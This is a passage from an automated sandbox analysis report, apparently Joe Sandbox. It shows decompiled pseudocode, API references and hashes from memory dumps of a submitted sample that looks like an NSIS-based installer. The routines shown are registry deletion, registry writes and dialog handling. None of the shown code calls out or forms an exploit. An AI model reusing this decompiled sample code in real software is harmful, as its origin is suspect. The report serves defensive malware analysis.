0x732d1b41
0x732d1ab6
0x732d1ab6
0x732d1ab7
0x732d1b26
0x732d1b28
0x00000000
0x00000000
0x732d1b2a
0x732d1b2d
0x00000000
0x00000000
0x00000000
0x732d1b2d
0x732d1ab9
0x732d1ab9
0x732d1aba
0x732d1af7
0x732d1afc
0x732d1b19
0x732d1b1c
0x00000000
0x00000000
0x732d1b1e
0x00000000
0x00000000
0x732d1b20
0x732d1b22
0x00000000
0x00000000
0x00000000
0x732d1b24
0x732d1afe
0x732d1b03
0x732d1b05
0x732d1b07
0x732d1b09
0x732d1b12
0x732d1b0b
0x732d1b0b
0x732d1b0b
0x00000000
0x732d1b09
0x732d1abc
0x732d1abc
0x732d1abf
0x732d1af0
0x732d1af2
0x00000000
0x732d1af2
0x732d1ac1
0x732d1ac1
0x732d1ac4
0x732d1ad7
0x732d1adc
0x732d1ae9
0x732d1aeb
0x00000000
0x732d1aeb
0x732d1ade
0x732d1ae0
0x00000000
0x00000000
0x732d1ae2
0x732d1ae5
0x00000000
0x00000000
0x00000000
0x732d1ae7
0x732d1ac7
0x732d1ac8
0x732d1ace
0x732d1ad0
0x732d1ad0
0x00000000
0x732d1ac8
0x732d19ef
0x732d1a68
0x732d1a6a
0x732d1a6d
0x732d1a8b
0x732d1a8e
0x732d1a94
0x732d1a99
0x732d1a6f
0x732d1a6f
0x732d1a73
0x732d1a77
0x732d1a79
0x732d1a79
0x732d1a9c
0x732d1aa0
0x00000000
0x732d1aa6
0x732d1aa6
0x732d1aa9
0x00000000
0x732d1aa9
0x732d1aa0
0x732d19f1
0x732d19f4
0x732d1a59
0x732d1a5b
0x732d1a5d
0x00000000
0x00000000
0x00000000
0x732d1a63
0x732d19f6
0x732d19f9
0x00000000
0x00000000
0x732d19fb
0x732d19fc
0x732d1a32
0x732d1a37
0x732d1a4f
0x732d1a51
0x00000000
0x732d1a51
0x732d1a39
0x732d1a3b
0x00000000
0x00000000
0x732d1a41
0x732d1a44
0x00000000
0x00000000
0x00000000
0x732d1a4a
0x732d19fe
0x732d1a01
0x732d1a28
0x00000000
0x732d1a03
0x732d1a03
0x732d1a04
0x732d1a18
0x732d1a1a
0x732d1a06
0x732d1a08
0x732d1a0e
0x732d1a10
0x732d1a10
0x732d1a08
0x00000000
0x732d1a04

APIs

GlobalFree.KERNEL32 ref: 732D19DA
GlobalFree.KERNEL32 ref: 732D1B7A
GlobalFree.KERNEL32 ref: 732D1B7F

Memory Dump Source

Source File: 00000001.00000002.886480223.00000000732D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 732D0000, based on PE: true

Associated: 00000001.00000002.886476119.00000000732D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.886488080.00000000732D4000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.886506522.00000000732D6000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_732d0000_aSsc9zh1ex.jbxd

Similarity

API ID: FreeGlobal
String ID:
API String ID: 2979337801-0
Opcode ID: 5cb183d8026310c9f8b8b30e253383eaf2d3f1850c92e211cffcf0f1883fd4b8
Instruction ID: dc9c0d98887c959fc1198bf4db542519249d5b4a3ffd10012d3ad38c1f54f0f9
Opcode Fuzzy Hash: 5cb183d8026310c9f8b8b30e253383eaf2d3f1850c92e211cffcf0f1883fd4b8
Instruction Fuzzy Hash: 40510932F3011AABEB869FB4C44479D7BBAEB44300F148159D406B3E94F6B5BAC5C791

Uniqueness

Uniqueness Score: -1.00%

Function 00402EA9 Relevance: 7.6, APIs: 5, Instructions: 84
registryCOMMON

Download Yara Rule

C-Code - Quality: 48%

			E00402EA9(void* __eflags, void* _a4, short* _a8, signed int _a12) {
				void* _v8;
				int _v12;
				short _v536;
				void* _t27;
				signed int _t33;
				intOrPtr* _t35;
				signed int _t45;
				signed int _t46;
				signed int _t47;

				_t46 = _a12;
				_t47 = _t46 & 0x00000300;
				_t45 = _t46 & 0x00000001;
				_t27 = E00406387(__eflags, _a4, _a8, _t47 | 0x00000009,  &_v8);
				if(_t27 == 0) {
					if((_a12 & 0x00000002) == 0) {
						L3:
						_push(0x105);
						_push( &_v536);
						_push(0);
						while(RegEnumKeyW(_v8, ??, ??, ??) == 0) {
							__eflags = _t45;
							if(__eflags != 0) {
								L10:
								RegCloseKey(_v8);
								return 0x3eb;
							}
							_t33 = E00402EA9(__eflags, _v8,  &_v536, _a12);
							__eflags = _t33;
							if(_t33 != 0) {
								break;
							}
							_push(0x105);
							_push( &_v536);
							_push(_t45);
						}
						RegCloseKey(_v8);
						_t35 = E004068E7(3);
						if(_t35 != 0) {
							return  *_t35(_a4, _a8, _t47, 0);
						}
						return RegDeleteKeyW(_a4, _a8);
					}
					_v12 = 0;
					if(RegEnumValueW(_v8, 0,  &_v536,  &_v12, 0, 0, 0, 0) != 0x103) {
						goto L10;
					}
					goto L3;
				}
				return _t27;
			}

0x00402eb4
0x00402ebd
0x00402ec6
0x00402ed2
0x00402edb
0x00402ee5
0x00402f0a
0x00402f10
0x00402f15
0x00402f16
0x00402f46
0x00402f1f
0x00402f21
0x00402f71
0x00402f74
0x00000000
0x00402f7a
0x00402f30
0x00402f35
0x00402f37
0x00000000
0x00000000
0x00402f3f
0x00402f44
0x00402f45
0x00402f45
0x00402f52
0x00402f5a
0x00402f61
0x00000000
0x00402f8a
0x00000000
0x00402f69
0x00402ef5
0x00402f08
0x00000000
0x00000000
0x00000000
0x00402f08
0x00402f90

APIs

RegEnumValueW.ADVAPI32 ref: 00402EFD
RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F49
RegCloseKey.ADVAPI32(?,?,?), ref: 00402F52
RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F69
RegCloseKey.ADVAPI32(?,?,?), ref: 00402F74

Memory Dump Source

Source File: 00000001.00000002.885897193.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.885892219.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.885904269.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.885909054.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886091471.000000000077C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886099918.0000000000782000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886106311.0000000000786000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886112266.0000000000788000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886136070.00000000007A4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886142041.00000000007A6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886147369.00000000007A9000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886152715.00000000007AD000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886158026.00000000007B3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886162273.00000000007B5000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886169924.00000000007D6000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_aSsc9zh1ex.jbxd

Similarity

API ID: CloseEnum$DeleteValue
String ID:
API String ID: 1354259210-0
Opcode ID: 78d35a7524f1d2205fa0e87ab22fa6bfb41dfe8b1a27fd9ec563711b6eb4cb1f
Instruction ID: c11aca49d0effc85046ccc9aadc56b913b01f210672418aaa5aa9f4d8e4c938e
Opcode Fuzzy Hash: 78d35a7524f1d2205fa0e87ab22fa6bfb41dfe8b1a27fd9ec563711b6eb4cb1f
Instruction Fuzzy Hash: 8C212A7150010ABBDF11AF90CE89EEF7B7DEB54384F110076F909B21A0D7B59E54AA68

Uniqueness

Uniqueness Score: -1.00%

Function 00401D81 Relevance: 7.6, APIs: 5, Instructions: 75
windowCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E00401D81(void* __ebx, void* __edx) {
				struct HWND__* _t30;
				WCHAR* _t38;
				void* _t48;
				void* _t53;
				signed int _t55;
				signed int _t60;
				long _t63;
				void* _t65;

				_t53 = __ebx;
				if(( *(_t65 - 0x23) & 0x00000001) == 0) {
					_t30 = GetDlgItem( *(_t65 - 8),  *(_t65 - 0x28));
				} else {
					E00402D84(2);
					 *((intOrPtr*)(__ebp - 0x10)) = __edx;
				}
				_t55 =  *(_t65 - 0x24);
				 *(_t65 + 8) = _t30;
				_t60 = _t55 & 0x00000004;
				 *(_t65 - 0x38) = _t55 & 0x00000003;
				 *(_t65 - 0x18) = _t55 >> 0x1f;
				 *(_t65 - 0x40) = _t55 >> 0x0000001e & 0x00000001;
				if((_t55 & 0x00010000) == 0) {
					_t38 =  *(_t65 - 0x2c) & 0x0000ffff;
				} else {
					_t38 = E00402DA6(0x11);
				}
				 *(_t65 - 0x44) = _t38;
				GetClientRect( *(_t65 + 8), _t65 - 0x60);
				asm("sbb esi, esi");
				_t63 = LoadImageW( ~_t60 &  *0x7a8a60,  *(_t65 - 0x44),  *(_t65 - 0x38),  *(_t65 - 0x58) *  *(_t65 - 0x18),  *(_t65 - 0x54) *  *(_t65 - 0x40),  *(_t65 - 0x24) & 0x0000fef0);
				_t48 = SendMessageW( *(_t65 + 8), 0x172,  *(_t65 - 0x38), _t63);
				if(_t48 != _t53 &&  *(_t65 - 0x38) == _t53) {
					DeleteObject(_t48);
				}
				if( *((intOrPtr*)(_t65 - 0x30)) >= _t53) {
					_push(_t63);
					E00406461();
				}
				 *0x7a8ae8 =  *0x7a8ae8 +  *((intOrPtr*)(_t65 - 4));
				return 0;
			}

0x00401d81
0x00401d85
0x00401d9a
0x00401d87
0x00401d89
0x00401d8f
0x00401d8f
0x00401da0
0x00401da3
0x00401dad
0x00401db0
0x00401db8
0x00401dc9
0x00401dcc
0x00401dd7
0x00401dce
0x00401dd0
0x00401dd0
0x00401ddb
0x00401de5
0x00401e0c
0x00401e1b
0x00401e29
0x00401e31
0x00401e39
0x00401e39
0x00401e42
0x00401e48
0x00402ba4
0x00402ba4
0x00402c2d
0x00402c39

APIs

GetDlgItem.USER32 ref: 00401D9A
GetClientRect.USER32 ref: 00401DE5
LoadImageW.USER32 ref: 00401E15
SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E29
DeleteObject.GDI32(00000000), ref: 00401E39

Memory Dump Source

Source File: 00000001.00000002.885897193.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.885892219.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.885904269.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.885909054.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886091471.000000000077C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886099918.0000000000782000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886106311.0000000000786000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886112266.0000000000788000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886136070.00000000007A4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886142041.00000000007A6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886147369.00000000007A9000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886152715.00000000007AD000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886158026.00000000007B3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886162273.00000000007B5000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886169924.00000000007D6000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_aSsc9zh1ex.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: a6aad87a710fcdef47f5999398108e389655c35983e9ac7c8f9262d328879ae0
Instruction ID: 28669104e63112c2688ec1bf4ccd66a2dfd92d91aff3cd1988410ea650e2814b
Opcode Fuzzy Hash: a6aad87a710fcdef47f5999398108e389655c35983e9ac7c8f9262d328879ae0
Instruction Fuzzy Hash: 1721F672D04119AFCB05DBA4DE45AEEBBB5EF08304F14403AF945F62A0DB389951DB98

Uniqueness

Uniqueness Score: -1.00%

Function 00401E4E Relevance: 7.5, APIs: 5, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E00401E4E(intOrPtr __edx) {
				void* __edi;
				int _t9;
				signed char _t15;
				struct HFONT__* _t18;
				intOrPtr _t30;
				void* _t31;
				struct HDC__* _t33;
				void* _t35;

				_t30 = __edx;
				_t33 = GetDC( *(_t35 - 8));
				_t9 = E00402D84(2);
				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
				0x40cdc8->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t33, 0x5a), 0x48));
				ReleaseDC( *(_t35 - 8), _t33);
				 *0x40cdd8 = E00402D84(3);
				_t15 =  *((intOrPtr*)(_t35 - 0x20));
				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
				 *0x40cddf = 1;
				 *0x40cddc = _t15 & 0x00000001;
				 *0x40cddd = _t15 & 0x00000002;
				 *0x40cdde = _t15 & 0x00000004;
				E00406557(_t9, _t31, _t33, 0x40cde4,  *((intOrPtr*)(_t35 - 0x2c)));
				_t18 = CreateFontIndirectW(0x40cdc8);
				_push(_t18);
				_push(_t31);
				E00406461();
				 *0x7a8ae8 =  *0x7a8ae8 +  *((intOrPtr*)(_t35 - 4));
				return 0;
			}

0x00401e4e
0x00401e59
0x00401e5b
0x00401e68
0x00401e7f
0x00401e84
0x00401e91
0x00401e96
0x00401e9a
0x00401ea5
0x00401eac
0x00401ebe
0x00401ec4
0x00401ec9
0x00401ed3
0x00402638
0x0040156d
0x00402ba4
0x00402c2d
0x00402c39

APIs

GetDC.USER32(?), ref: 00401E51
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E6B
MulDiv.KERNEL32(00000000,00000000), ref: 00401E73
ReleaseDC.USER32 ref: 00401E84

Part of subcall function 00406557: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 004066FC
Part of subcall function 00406557: lstrlenW.KERNEL32(Call,00000000,007A0F28,?,004055B3,007A0F28,00000000), ref: 00406756

CreateFontIndirectW.GDI32(0040CDC8), ref: 00401ED3

Memory Dump Source

Source File: 00000001.00000002.885897193.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.885892219.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.885904269.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.885909054.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886091471.000000000077C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886099918.0000000000782000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886106311.0000000000786000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886112266.0000000000788000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886136070.00000000007A4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886142041.00000000007A6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886147369.00000000007A9000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886152715.00000000007AD000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886158026.00000000007B3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886162273.00000000007B5000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886169924.00000000007D6000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_aSsc9zh1ex.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectReleaselstrcatlstrlen
String ID:
API String ID: 2584051700-0
Opcode ID: 80dbc2b2fae4c7c566210f3db186a97745b6b4268190bf82bcd042cd3ccc65f3
Instruction ID: 0d45dbb9e622ade016cb62109ac663f1c9afcfae21dbc147df73c93619ae97e2
Opcode Fuzzy Hash: 80dbc2b2fae4c7c566210f3db186a97745b6b4268190bf82bcd042cd3ccc65f3
Instruction Fuzzy Hash: 6401D871940641EFEB006BB4AE89BDA3FB0AF15301F10493AF141B61D2C6B90404DB2C

Uniqueness

Uniqueness Score: -1.00%

Function 00401C43 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84
windowtimeCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E00401C43(intOrPtr __edx) {
				int _t29;
				long _t30;
				signed int _t32;
				WCHAR* _t35;
				long _t36;
				int _t41;
				signed int _t42;
				int _t46;
				int _t56;
				intOrPtr _t57;
				struct HWND__* _t63;
				void* _t64;

				_t57 = __edx;
				_t29 = E00402D84(3);
				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
				 *(_t64 - 0x18) = _t29;
				_t30 = E00402D84(4);
				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
				 *(_t64 + 8) = _t30;
				if(( *(_t64 - 0x1c) & 0x00000001) != 0) {
					 *((intOrPtr*)(__ebp - 0x18)) = E00402DA6(0x33);
				}
				__eflags =  *(_t64 - 0x1c) & 0x00000002;
				if(( *(_t64 - 0x1c) & 0x00000002) != 0) {
					 *(_t64 + 8) = E00402DA6(0x44);
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x34)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t61 = E00402DA6();
					_t32 = E00402DA6();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t35 =  ~( *_t31) & _t61;
					__eflags = _t35;
					_t36 = FindWindowExW( *(_t64 - 0x18),  *(_t64 + 8), _t35,  ~( *_t32) & _t32);
					goto L10;
				} else {
					_t63 = E00402D84();
					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
					_t41 = E00402D84(2);
					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
					_t56 =  *(_t64 - 0x1c) >> 2;
					if(__eflags == 0) {
						_t36 = SendMessageW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8));
						L10:
						 *(_t64 - 0x38) = _t36;
					} else {
						_t42 = SendMessageTimeoutW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8), _t46, _t56, _t64 - 0x38);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x30)) - _t46;
				if( *((intOrPtr*)(_t64 - 0x30)) >= _t46) {
					_push( *(_t64 - 0x38));
					E00406461();
				}
				 *0x7a8ae8 =  *0x7a8ae8 +  *((intOrPtr*)(_t64 - 4));
				return 0;
			}

0x00401c43
0x00401c45
0x00401c4c
0x00401c4f
0x00401c52
0x00401c5c
0x00401c60
0x00401c63
0x00401c6c
0x00401c6c
0x00401c6f
0x00401c73
0x00401c7c
0x00401c7c
0x00401c7f
0x00401c83
0x00401c85
0x00401cda
0x00401cdc
0x00401ce7
0x00401cf1
0x00401cf4
0x00401cf4
0x00401cfd
0x00000000
0x00401c87
0x00401c8e
0x00401c90
0x00401c93
0x00401c99
0x00401ca0
0x00401ca3
0x00401ccb
0x00401d03
0x00401d03
0x00401ca5
0x00401cb3
0x00401cbb
0x00401cbe
0x00401cbe
0x00401ca3
0x00401d06
0x00401d09
0x00401d0f
0x00402ba4
0x00402ba4
0x00402c2d
0x00402c39

APIs

SendMessageTimeoutW.USER32 ref: 00401CB3
SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CCB

Strings

!, xrefs: 00401C7F

Memory Dump Source

Source File: 00000001.00000002.885897193.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.885892219.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.885904269.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.885909054.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886091471.000000000077C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886099918.0000000000782000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886106311.0000000000786000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886112266.0000000000788000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886136070.00000000007A4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886142041.00000000007A6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886147369.00000000007A9000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886152715.00000000007AD000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886158026.00000000007B3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886162273.00000000007B5000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886169924.00000000007D6000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_aSsc9zh1ex.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: 443c3db962ab0709f794cef0dd75cfbbc40298e4b9bc43596e0072424d6b1197
Instruction ID: f7a68e929e996113dc281fa05a4685e5ce16b579df1de56e4cd617e501a9a943
Opcode Fuzzy Hash: 443c3db962ab0709f794cef0dd75cfbbc40298e4b9bc43596e0072424d6b1197
Instruction Fuzzy Hash: 90219C7190421AEFEF05AFA4D94AAAE7BB4FF84304F14453EF601B61D0D7B88941CB98

Uniqueness

Uniqueness Score: -1.00%

Function 00404D23 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84
stringCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E00404D23(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
				char _v68;
				char _v132;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t23;
				signed int _t24;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t44;
				signed int _t46;
				signed int _t50;
				signed int _t52;
				signed int _t53;
				signed int _t55;

				_t23 = _a16;
				_t53 = _a12;
				_t44 = 0xffffffdc;
				if(_t23 == 0) {
					_push(0x14);
					_pop(0);
					_t24 = _t53;
					if(_t53 < 0x100000) {
						_push(0xa);
						_pop(0);
						_t44 = 0xffffffdd;
					}
					if(_t53 < 0x400) {
						_t44 = 0xffffffde;
					}
					if(_t53 < 0xffff3333) {
						_t52 = 0x14;
						asm("cdq");
						_t24 = 1 / _t52 + _t53;
					}
					_t25 = _t24 & 0x00ffffff;
					_t55 = _t24 >> 0;
					_t46 = 0xa;
					_t50 = ((_t24 & 0x00ffffff) + _t25 * 4 + (_t24 & 0x00ffffff) + _t25 * 4 >> 0) % _t46;
				} else {
					_t55 = (_t23 << 0x00000020 | _t53) >> 0x14;
					_t50 = 0;
				}
				_t31 = E00406557(_t44, _t50, _t55,  &_v68, 0xffffffdf);
				_t33 = E00406557(_t44, _t50, _t55,  &_v132, _t44);
				_t34 = E00406557(_t44, _t50, 0x7a1f48, 0x7a1f48, _a8);
				wsprintfW(_t34 + lstrlenW(0x7a1f48) * 2, L"%u.%u%s%s", _t55, _t50, _t33, _t31);
				return SetDlgItemTextW( *0x7a7a38, _a4, 0x7a1f48);
			}

0x00404d2c
0x00404d31
0x00404d39
0x00404d3a
0x00404d47
0x00404d4f
0x00404d50
0x00404d52
0x00404d54
0x00404d56
0x00404d59
0x00404d59
0x00404d60
0x00404d66
0x00404d66
0x00404d6d
0x00404d74
0x00404d77
0x00404d7a
0x00404d7a
0x00404d7e
0x00404d8e
0x00404d90
0x00404d93
0x00404d3c
0x00404d3c
0x00404d43
0x00404d43
0x00404d9b
0x00404da6
0x00404dbc
0x00404dcd
0x00404de9

APIs

lstrlenW.KERNEL32(007A1F48,007A1F48,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404DC4
wsprintfW.USER32 ref: 00404DCD
SetDlgItemTextW.USER32 ref: 00404DE0

Strings

%u.%u%s%s, xrefs: 00404DAE

Memory Dump Source

Source File: 00000001.00000002.885897193.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.885892219.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.885904269.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.885909054.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886091471.000000000077C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886099918.0000000000782000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886106311.0000000000786000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886112266.0000000000788000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886136070.00000000007A4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886142041.00000000007A6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886147369.00000000007A9000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886152715.00000000007AD000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886158026.00000000007B3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886162273.00000000007B5000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886169924.00000000007D6000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_aSsc9zh1ex.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s
API String ID: 3540041739-3551169577
Opcode ID: 1bfcb38a10210d596bf4d505370845bd3ec1d918e724b2dddb7cd3055ac07146
Instruction ID: 68f5f2c35a4a9d0707adcc228443cff0cbca91619b9e39d4db13cc85b0838dbb
Opcode Fuzzy Hash: 1bfcb38a10210d596bf4d505370845bd3ec1d918e724b2dddb7cd3055ac07146
Instruction Fuzzy Hash: C911A5736041283BDB1065ADAC45EAE329C9F86334F250237FA66F71D5EA79981182E8

Uniqueness

Uniqueness Score: -1.00%

Function 0040248A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64
registrystringCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E0040248A(void* __eax, int __ebx, intOrPtr __edx, void* __eflags) {
				void* _t20;
				void* _t21;
				int _t24;
				int _t30;
				intOrPtr _t33;
				void* _t34;
				intOrPtr _t37;
				void* _t39;
				void* _t42;

				_t42 = __eflags;
				_t33 = __edx;
				_t30 = __ebx;
				_t37 =  *((intOrPtr*)(_t39 - 0x20));
				_t34 = __eax;
				 *(_t39 - 0x10) =  *(_t39 - 0x1c);
				 *(_t39 - 0x44) = E00402DA6(2);
				_t20 = E00402DA6(0x11);
				 *(_t39 - 4) = 1;
				_t21 = E00402E36(_t42, _t34, _t20, 2);
				 *(_t39 + 8) = _t21;
				if(_t21 != __ebx) {
					_t24 = 0;
					if(_t37 == 1) {
						E00402DA6(0x23);
						_t24 = lstrlenW(0x40b5c8) + _t29 + 2;
					}
					if(_t37 == 4) {
						 *0x40b5c8 = E00402D84(3);
						 *((intOrPtr*)(_t39 - 0x38)) = _t33;
						_t24 = _t37;
					}
					if(_t37 == 3) {
						_t24 = E004032B4( *((intOrPtr*)(_t39 - 0x24)), _t30, 0x40b5c8, 0x1800);
					}
					if(RegSetValueExW( *(_t39 + 8),  *(_t39 - 0x44), _t30,  *(_t39 - 0x10), 0x40b5c8, _t24) == 0) {
						 *(_t39 - 4) = _t30;
					}
					_push( *(_t39 + 8));
					RegCloseKey();
				}
				 *0x7a8ae8 =  *0x7a8ae8 +  *(_t39 - 4);
				return 0;
			}

0x0040248a
0x0040248a
0x0040248a
0x0040248a
0x0040248d
0x00402494
0x0040249e
0x004024a1
0x004024aa
0x004024b1
0x004024b8
0x004024bb
0x004024c1
0x004024cb
0x004024cf
0x004024da
0x004024da
0x004024e1
0x004024eb
0x004024f1
0x004024f4
0x004024f4
0x004024f8
0x00402504
0x00402504
0x0040251d
0x0040251f
0x0040251f
0x00402522
0x004025fd
0x004025fd
0x00402c2d
0x00402c39

APIs

lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsc4B5D.tmp,00000023,00000011,00000002), ref: 004024D5
RegSetValueExW.ADVAPI32(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsc4B5D.tmp,00000000,00000011,00000002), ref: 00402515
RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsc4B5D.tmp,00000000,00000011,00000002), ref: 004025FD

Strings

